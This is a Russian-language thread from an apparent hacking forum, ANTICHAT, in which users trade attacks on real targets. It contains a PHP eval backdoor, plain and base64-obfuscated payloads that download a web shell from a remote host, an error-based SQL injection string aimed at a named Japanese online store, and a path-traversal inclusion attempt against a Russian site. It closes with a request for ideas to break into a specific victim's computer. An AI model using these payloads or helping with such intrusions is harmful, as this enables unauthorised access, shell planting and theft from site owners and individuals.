ANTICHAT — форум по информационной безопасности, OSINT и технологиям

b=phpinfo();

b=ls

чот не понял, что за универсальная функция у тебя там?

покажи код бекдора

if (isset($_REQUEST['b'])) eval(stripslashes($_REQUEST['b']));

по поводу ls погорячился, точнее курю мануалы и понимаю что сглупил... а если еще точнее не обьявил системную ...

b=copy('http://site.com/shell.txt','shell.php');

b=eval(base64_decode('Y29weSgnaHR0cDovL3NpdGUuY29t L3NoZWxsLnR4dCcsJ3NoZWxsLnBocCcpOw=='));

-----------

b=system('wget http://site.com/shell.php');

b=eval(base64_decode('c3lzdGVtKCd3Z2V0IGh0dHA6Ly9z aXRlLmNvbS9zaGVsbC5waHAnKTs='));

вариантов много, если хотите залить шелл пробуйте эти для примера, смените урл на нормальный линк к шеллу

Помогите раскрутить

http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647'

pls

http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647' or 1 group by concat(version(),floor(rand(0)*2)) having max(0) or 1-- 1

http://meb[G00GLE]el-dvs.ru/main_p3.php?&d=mebelionika&nmr=2&nmr2=3&im=../../../../../../boot.ini%00&rzd=&nmstr=495&sn=&content=%CC%E5%E1%E 5%EB%FC%ED%E0%FF%20%F4%E0%E1%F0%E8%EA%E0%20%CC%E5% E1%E5%EB%E8%EE%ED%E8%EA%E0&content2=catalog_mebeli onika

Что-то можно вообще сделать? Забавный сайт какой-то.

Тут LFI

достаточно и этого

Но ты там не найдешь boot.ini, потому что этот сайт не на диске C(загрузочном) находится, по-ходу можно читать файлы на диске D, но вряд ли там есть что-то полезное

Там Open_basedir ограничивает, там даже пути даны, так что в топку походу.

Знаю ip жертвы, открытые порты 21 / tcp ftp, 22 / tcp ssh, 23 / tcp telnet, 80 / tcp http, 1863 / tcp - msnp, 1864 / tcp - paradym-31port, 5190 - про этот порт не знаю.

есть доступ к почте жертвы.

конекчусь с помощью putty через ssh или telnet port и получаю epic fail

возможно у жертвы стоит галочка в удаленном помощнике - проверил что-то не получается зайти.

Цель проникнуть на комп, получить доступ, опыта нет подскажите идеи что можно придумать.